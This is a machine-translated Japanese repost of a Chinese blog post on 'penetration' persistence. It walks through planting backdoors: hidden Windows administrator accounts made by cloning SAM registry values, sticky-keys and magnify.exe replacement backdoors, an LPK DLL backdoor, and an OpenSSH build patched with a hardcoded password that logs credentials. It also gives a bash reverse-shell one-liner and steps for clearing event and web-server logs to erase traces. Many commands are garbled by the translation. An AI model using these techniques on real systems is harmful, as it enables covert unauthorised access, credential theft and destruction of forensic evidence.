ネットワークセキュリティ(浸透サーティーン)

ウィンドウズ

  1. ユーザーは、バックドアアカウント
    NETをユーザー
    NETユーザーAA /追加
    管理者A /追加のNETのLOCALGROUP
    マイコンピュータ-管理-ローカルユーザーグループを、パスワードを設定した後に作成したユーザーを右クリックし
    、レジストリレジストリエディターを開くためにSAMを選択し、完全な制御を追加するために、誰も許可
    管理者の名前を見て、対応するタイプ名0x1f4、
    [管理者のバイナリ値を見つけ、すべてのコピーを選択し
    、同じ操作を、ユーザーが作成し、自分自身を作成するために、添付のバイナリ値の管理者を見つける
    最後に、セットをみんなの許可を削除するには


    ネットユーザーのゲスト/アクティブ:はい
    、ネットユーザーのゲスト123.com
    ネットLOCALGROUP管理者のゲスト/アドオン


    隠すアカウント:
    移動support_388945a0ユーザーの
    コンピュータ-管理-ユーザー-パスワードsupport_388945a0
    右プロパティ]をクリックします-ダイヤル-リモートアクセスを可能にします

    [マイコンピュータ] -管理-ユーザのパスワードの後に作成したローカルユーザーグループを右クリックして
    、レジストリレジストリエディターを開くには、SAMを選択し、完全な制御を追加するために皆の許可
    管理者の名前、ならびに対応するタイプ名0x1f4を見つけるために、
    見つけるために、バイナリ値の管理者は、Fテーブルの名前を選択すべてコピーする
    、support_388945a0に添付バイナリ値の管理者support_388945a0を見つけ、同じ操作を
    最後に、削除皆の権限設定

    マイコンピュータ - プロパティ - リモートデスクトップを開きます

  2. LPKバックドア
    ユーザーを作成した後
    LPKを使用してlpk.dllファイルを生成し
    、その後lpk.dllのsystem32ファイルのうち、ターゲットサーバーへ
    の接続]ページで3389の目標、プレスの5倍の接着シフトキーを起動する
    と、その後は良いを設定するボタンを押して、プログラムを起動するためのパスワードを入力してください

  3. トロイの木馬、バックドアの
    夢の時代

明確な兆候-コンピュータ-管理
イベントビューア-セキュリティ-右クリックしてすべてクリアイベント

IISマネージャ-アクセスWebサイトのプロパティ] - [プロパティログ
ログファイルのプロパティを-マイコンピュータは、レコードへのアクセスを削除するに比べ、オープンします

Linuxの

  1. バックドア
    アップロードされた後に解凍する2つのツール
    のtar zxvf OpenSSHの5.9p 1.tar.gz-
    タールzxvf 0x06で、OpenSSHの5.9p 1.patch.tar.gz-
    CD-5.9p1.pathのOpenSSH /
    CP sshbd5.9p1.diff ... / OpenSSHの-5.9p1
    CD ... / 5.9p1 OpenSSH-
    パッチ<バックドアパス// sshbd5.9p1.diff

    VI includes.h //修正バックドアパスワード、ログファイルの場所
    / *
    +#マシンに//ログは、ユーザー名とパスワードを記録した"/を/ tmp / ILOG" ILOGを定義する
    "を/ tmp / +#OLOGを定義 // OLOG" 録音リモートユーザ名とパスワードにログオンは
    +#SECRETPW「123456」//バックドアパスワードを定義
    * /

    yumをインストール-yのopensslのopenssl-develのPAM-develの
    は./configure --prefix =は/ usr --sysconfdir =の/ etc / sshの--with-pamの--with-KERBEROS5

    //あなたは、インストールに問題がある場合はzlib
    // yumを-yインストールのzlib zlibの-develを

    makeは&&メイクインストール
    サービスを//再起動sshdを再起動sshdの
    着陸のssh

クリアトレース
VAR /ログ/ httpdの/ access_logの
など/のhttpd / Loga / access_logの

直接修改文件,将ip 访问的网站全部改掉
vim var/log/httpd/access_log

ソースパッケージ

asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb,进行下载
在本地访问用于打包的马进行解包

php源码打包  nosafe.php马 在根目录下最下方有全选
然后选择压缩

Tuoku:
データ管理-クーマオフ


シェルリバウンド。

エコー「bashの-i>&/dev/tcp/192.168.31.237/4444 0>&1」| bashの

bashの-i:bashは一般的なLinuxのシェルで、-iパラメータは、対話型シェルを生成を示しています

/dev/tcp/192.168.175.134/8080:は/ dev / tcpの| UDP / IP /ポートLinux上でのアクセスは、このファイルが存在しないでしょう場合は、その意味がホストにある、ファイルに特殊なLinuxのですポート上のターゲットホストのIP、TCPまたはUDPポートの接続を確立

0>&1:0標準入力標準出力1出力のリダイレクトします。1は既に今標準入力と標準出力0、標準出力/dev/tcp/192.168.175.134/8080にリダイレクトされているため、または、標準入力と合成標準出力0 1は、1をリダイレクトするために、理解することができます1ポイント/dev/tcp/192.168.175.134/8080。
エコーは+ | bashはbashのを付与することにより、インタラクティブシェルを有する中間導管で


シフトバックドアが
Cになります:\ WINDOWS \ SYSTEM32 \ dllcacheに \ sethc.exeは、このフォルダを削除背中を変更自動的に削除されない場合は、キャッシュを置きました。

Cを削除:\ sethc.exeファイルWINDOWS \ SYSTEM32 \の下に。

Cの名前を変更:\ WINDOWS \ SYSTEM32 \ sethc.exeある下CMD.EXE。

次のシフト管理者権限をポップアップ表示するために5 DOSウィンドウを押します。


ガラスバックドアを拡大

作成magnify.bat

オフ@echo
ネットユーザー管理者$ woaijiushi追加/
ネットLOCALGROUP管理者は$追加/ハック
は%Windir%\ SYSTEM32 \ nagnify.exe
の出口を

Bat2com EXE BATファイルにファイルを変換するために、他のツールを使用して
、それぞれCを交換生成magnify.exe:\ WINDOWS \ SYSTEM32 \ magnify.exe CとDLLCACHE下:\ WINDOWS \ system32にmagnify.exe下の\

+ Uキーの組み合わせウィン着陸を呼び出すことによって。

公開された17元の記事 ウォンの賞賛2 ビュー3516

おすすめ

転載: blog.csdn.net/Aidang/article/details/104474845